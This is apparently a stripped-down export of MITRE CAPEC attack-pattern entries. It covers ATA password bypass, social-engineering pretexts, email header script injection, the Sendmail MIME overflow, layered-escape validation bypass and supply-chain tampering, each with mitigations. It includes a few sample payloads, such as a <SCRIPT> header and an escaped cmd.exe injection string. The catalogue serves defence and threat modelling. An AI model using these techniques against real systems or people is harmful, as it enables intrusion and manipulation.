An attacker exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.
Access to the system containing the ATA Drive so that the drive can be physically removed from the system.
1000
Attack Pattern
ChildOf
401
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker employs various means of gathering information about a target company, organization, or person. These techniques may range from using telephones, gathering trash or other discarded information, intrusion within company property, using the Internet for research, to querying individuals under false or misleading pretenses. A social engineer can use many small pieces of information to combine into a useful vulnerability of a system. Information can be important whether it comes from the janitor's office or from the CEO's office; each piece of paper, employee spoken to or area visited by the social engineer can add up enough information to attain access to sensitive data and resources of the company. The lesson here is all information, no matter how insignificant the employee believes it to be, may assist in creating a vulnerability for a company and an entrance for a social engineer. While the ultimate goal of the attacker may vary the purpose of these attacks is usually to gain access to computer systems or facilities.
Low
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker employs various methods of information gathering to collect a body of information that facilitates the attackers' goals toward the target organization. Because an attacker's goals can vary so widely during this phase there is no one particular methodology that is often employed. During the research phase, for example, an attacker could use a company's automated directory service via the telephone to identify individuals in key positions of authority. Other methods could involve casing an establishment during high traffic hours to determine how strictly employees monitor who is entering the building behind them or something as simple as internet searching. Gathering information to support social engineering exercises is much the same as research you do for anything else. You need a goal in mind when you start in order to keep the research focused. Having a clear objective helps you determine what information is relevant to the end goal and what can be ignored. This holds true not only for the information gathered but also for how it's gathered.
Low
1000
Attack Pattern
ChildOf
404
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more. By collecting this information an attacker may be able to learn important facts about the person or organization that play a role in helping the attacker in their attack.
Low
1000
Attack Pattern
ChildOf
404
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the attackers' interests. During a pretexting attack the attacker creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie, in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. Basic pretexting attacks may simply seek to learn information about a target, but more complicated pretexting attacks seek to solicit a target to perform some action that assists the attacker in exploiting organizational weaknesses or obtaining access to secure facilities or systems. One example of a pretexting attack could be to dress up like a jogger and run in place by the entrance of a building, pretending to look for your access card. Because the hood obscures you face, it may be possible to solicit someone inside the building to let you inside. Pretexting is also not a one-size fits all solution. A social engineering attacker will have to develop many different pretexts over their career. All of them will have one thing in common, research. Good information gather techniques can make or break a good pretext. Being able to mimic the perfect tech support rep is useless if the target does not use outside support. Pretexting is also used in other areas of life other than social engineering. Sales, public speaking, so-called fortune tellers, NLP experts and even doctors, lawyers, therapists and the like all have to use a form of pretexting. They all have to create a scenario where a person is comfortable with releasing information they normally would not. One of the most important aspects of social engineering is trust. If the attacker cannot build trust they will most likely fail. A solid pretext is an essential part of building trust. If an attacker's alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on. Similar to inserting the proper key in a lock, the right pretext provides the proper cues to those around the attacker and can disarm their suspicions or doubts and open up the doors, so to speak. .
Low
1000
Attack Pattern
ChildOf
404
1000
Attack Pattern
ChildOf
410
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in information gathering activities from traditional sources which are typically open, publicly available sources of information that don't require any illegal activity to obtain. Tradition sources can include corporate websites, DNS (Domain Name Service) records, or even social media sites such as blogs or wikis. The goal is to collect as much information as possible so as to construct an accurate model that aids the attacker in conducting further social engineering attacks.
Low
1000
Attack Pattern
ChildOf
404
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses sources of information which are less obvious and often overlooked to learn about the target person or organization. These sources could be industry experts or insiders who might reveal key pieces of information that help the attacker determine possible social engineering vulnerabilities in the target. Other types of oblique information gathering might be to case or stalk particular employees to find out popular after work venues. The attacker would then visit that venue and sit in close proximity to the target individuals to gather information.
Low
1000
Attack Pattern
ChildOf
404
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs.
Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.
Identify and characterize metacharacter-processing vulnerabilities in email headers
An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.
Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.
env-Web
Manually tampering email headers to inject malicious metacharacter-based payload content in them.
env-Web
The email client processes metacharacters in email headers.
env-Local
The email client does not process metacharacters in email headers.
env-Local
The email server will strip the headers that contain metacharacters
env-Web
The email server lets the malicious metacharacters in the email headers.
env-Web
The email client executes the malicious payload.
No malicious content is being delivered in the email by the server.
Monitor email headers for malicious content in metacharacters.
An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.
Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase.
env-Local
The payload executes on the target user's system.
Filtering email headers for malicious content.
This attack targets most widely deployed feature rich email applications, including web based email programs.
High
High
Injection
API Abuse
To:<someone@example.com>
From:<badguy@example.com>
Header<SCRIPT>payme</SCRIPT>def: whatever
Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.
Meta-characters like \w \s \d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.
Low
To distribute email
Design: Perform validation on email header data
Implementation: Implement email filtering solutions on mail server or on MTA, relay server.
Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Email
Metacharacters
Email processing routines of Email program
Enables attacker to execute server side code with any commands that the program owner has privileges to.
150
Targeted
88
Targeted
697
Targeted
713
Targeted
1000
Attack Pattern
ChildOf
242
1000
Attack Pattern
ChildOf
134
Penetration
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.
Low
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the attackers' interests. Pretexting involves a mixture of role-play, subterfuge, and possibly some forms of disguise. Basic pretexting attacks may simply seek to learn information about a target, but more complicated pretexting attacks seek to solicit a target to perform some action that assists the attacker in exploiting organizational weaknesses or obtaining access to secure facilities or systems. One example of a pretexting attack could be to dress up like a jogger and run in place by the entrance of a building, pretending to look for your access card. Because the hood obscures you face, it may be possible to solicit someone inside the building to let you inside.
Low
1000
Attack Pattern
CanAlsoBe
407
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.
Low
1000
Attack Pattern
ChildOf
407
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. An attacker who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an attacker physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.
Low
1000
Attack Pattern
ChildOf
407
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and "deliveries" in order to be able to pull it off.
Low
1000
Attack Pattern
ChildOf
407
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.
Low
1000
Attack Pattern
ChildOf
407
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits inherent human psychological predispositions to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the attackers' interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled attacker uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the attackers' speech and thought patterns.
Low
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a social engineering technique to produce a sense of obligation within the target to volunteer some key or sensitive piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. In the context of social engineering, obligation is closely related to reciprocation but is not limited to it. There are various techniques for producing a sense of obligation during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily. It can also be as simple as holding an outer door for someone will usually make them hold the inner door for you. It can be escalated to someone giving you private info because you create a sense of obligation. This is a common attack vector when targeting customer service people.
Low
1000
Attack Pattern
ChildOf
417
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
417
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.
Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4).
Identify places in the system where vulnerable MIME conversion routines may be used.
Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code.
The target system uses a mail server.
Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system.
High
High
Injection
Attack Example: Sendmail Overflow
A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.
Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.
CVE-1999-0047
Low
It may be trivial to cause a DoS via this attack pattern
High
Causing arbitrary code to execute on the target system.
The first step is to figure what mail server (and what version) is running on the target system.
Stay up to date with third party vendor patches
Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.
For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):
Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=mail -d $u
Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,
D=$z:/,
T=X-Unix,
A=sh -c $u
This can be achieved for the "Mlocal" and "Mprog" Mailers by modifying the ".mc" file to include the following lines:
define(`LOCAL_MAILER_FLAGS',
ifdef(`LOCAL_MAILER_FLAGS',
`translit(LOCAL_MAILER_FLAGS, `9')',
`rmn'))
define(`LOCAL_SHELL_FLAGS',
ifdef(`LOCAL_SHELL_FLAGS',
`translit(LOCAL_SHELL_FLAGS, `9')',
`eu'))
and then rebuilding the sendmail.cf file using m4(1).
From "Exploiting Software", please see reference below.
Use the sendmail restricted shell program (smrsh)
Use mail.local
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify memory
Availability
DoS: crash / exit / restart
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
The especially formatted e-mail message whose body is put together in a way as to trigger the MIME conversion buffer overflow in the 7 to 8 bit MIME conversion function.
The shell code included as part of the e-mail message body that is executed on the target system with root privileges after the stack based buffer overflow in the 7 to 8 bit MIME conversion function is leveraged.
The function performing 7 to 8 bit MIME conversion.
120
Targeted
119
Targeted
74
Targeted
20
Secondary
CVE-1999-0047
A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.
Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.
1000
Attack Pattern
ChildOf
100
Failing Securely
Penetration
Exploitation
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4
Software Engineering Institute: Carnegie Mellon University
http://www.cert.org/advisories/CA-1997-05.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a social engineering technique to convey a sense of authority that motivates the target reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization an attacker may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the attacker.
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the attackers' point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the attackers' perspective. One technique of framing is to avoid the use of the word "No" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the attacker.
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
Wikipedia
Framing (social sciences)
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Framing_(social_sciences)
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
416
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker attunes their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the attacker has adapted their communication forms to match those of the target. When skillfully employed the target is likely to be unaware that they are being manipulated.
Low
1000
Attack Pattern
ChildOf
427
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
427
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps.
The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application:
<parser1>
--> <input validator> -->
<parser2>
In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
Determine application/system inputs where bypassing input validation is desired
The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where he/she wants to bypass it.
While using an application/system, the attacker discovers an input where validation is stopping him/her from performing some malicious or unauthorized actions.
env-All
When provided with unexpected input, application provides an error message stating that the input was invalid or that access was denied.
env-All
Determine which character encodings are accepted by the application/system
The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly.
Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\'
env-All
Determine whether URL encoding is accepted by the application/system.
env-All
Determine whether UTF-8 encoding is accepted by the application/system.
env-All
Determine whether UTF-16 encoding is accepted by the application/system.
env-All
Determine if any other encodings are accepted by the application/system.
env-All
System provides error message similar to the one it provided when a positive indicator was received for the first step.
env-All
Application/system accepts at least one high level character encoding where characters can be represented with multiple ASCII characters.
Application/system interprets each character separately.
Detect and alert on appearance of encodings in log messages (e.g. "Unsuccessful login by <joe")
Combine multiple encodings accepted by the application.
The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.
Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: "\\\.". With two parsing layers, this may get converted to "\." after the first parsing layer, and then, to "." after the second. If the input validation layer is between the two parsing layers, then "\\\.\\\." might pass a test for ".." but still get converted to ".." afterwards. This may enable directory traversal attacks.
env-All
Combine multiple encodings and observe the effects. For example, the attacker might encode "." as "\.", and then, encode "\." as "\.", and then, encode that using URL encoding to "%26%2392%3B%26%2346%3B"
env-All
Application/System interprets the multiple encodings properly.
env-All
Attacker bypasses input validation layer(s) and passes data to application that it does not expect.
Ensure that the input validation layer is executed after as many parsing layers as possible.
Determine the details of any parsing layers that get executed after the input validation layer (this may be necessary in the case of filesystem access, for example, where the operating system also includes a parsing layer), and ensure that the input validator accounts for the various encodings of illegal characters and character sequences in those layers.
Leverage ability to bypass input validation
Attacker leverages his ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.
Gain access to sensitive files.
env-All
Perform command injection.
env-All
Perform SQL injection.
env-All
Perform XSS attacks.
env-All
Success outcome in previous step
env-All
Failure outcome in previous step
env-All
Gaining unauthorized access to system functionality.
User input is used to construct a command to be executed on the target system or as part of the file name.
Multiple parser passes are performed on the data supplied by the user.
High
Medium
Injection
Modification of Resources
Using Escapes
The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to "double escape" the backslash. In some cases, a quadruple escape is necessary.
Original String: C:\\\\winnt\\\\system32\\\\cmd.exe /c
<parsing layer>
Interim String: C:\\winnt\\system32\\cmd.exe /c
<parsing layer>
Final String: C:\winnt\system32\cmd.exe /c
This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.
[R.43.1][REF-2]
Medium
Initially a fuzzer can be used to see what the application is successfully and escaping and what causes problems. This may be a good starting point.
Manually try to introduce multiple layers of control characters and see how many layers the application can escape.
Control characters are being detected by the filters repeatedly.
An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.
Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
171
Targeted
179
Targeted
181
Targeted
184
Targeted
183
Targeted
77
Targeted
78
Targeted
74
Targeted
20
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
267
Defense in Depth
Penetration
Medium
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
427
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
430
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
431
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message. The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human "buffer overflow" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.
Low
1000
Attack Pattern
ChildOf
427
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
427
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
Low
1000
Attack Pattern
ChildOf
427
The Official Social Engineering Portal
Social-Engineer.org
Tick Tock Computers, LLC
http://www.social-engineer.org
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
Marcus Sachs
Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization
Verizon, Inc.
Thea Reilkoff
Hardware Trojans: A Novel Attack Meets a New Defense
Yale School of Engineering and Applied Science
2010
Marianne Swanson
Nadya Bartol
Rama Moorthy
Piloting Supply Chain Risk Management Practices for Federal Information Systems
Section 1. Introduction
Draft NISTIR 7622
National Institute of Standards and Technology
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.
A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.
External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution.
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
SAFECode
The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain
Safecode.org
2009
Marianne Swanson
Nadya Bartol
Rama Moorthy
Piloting Supply Chain Risk Management Practices for Federal Information Systems
Section 1. Introduction
Draft NISTIR 7622
National Institute of Standards and Technology
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the attacker access to the execution stack and execute arbitrary code in the target process. This attack pattern is a variant of standard buffer overflow attacks using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The attacker is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application, for the victim to download. The attacker then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.
Target software processes binary resource files.
Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file.
Very High
High
Modification of Resources
Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the attacker has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship.
Medium
To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability
Perform appropriate bounds checking on all buffers.
Design: Enforce principle of least privilege
Design: Static code analysis
Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes
Implementation: Keep software patched to ensure that known vulnerabilities are not available for attackers to target on host.
Availability
DoS: crash / exit / restart
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
120
Targeted
119
Targeted
697
Targeted
713
Targeted
1000
Attack Pattern
PeerOf
23
1000
Attack Pattern
PeerOf
35
1000
Attack Pattern
ChildOf
100
1000
Attack Pattern
ChildOf
165
Penetration
Exploitation
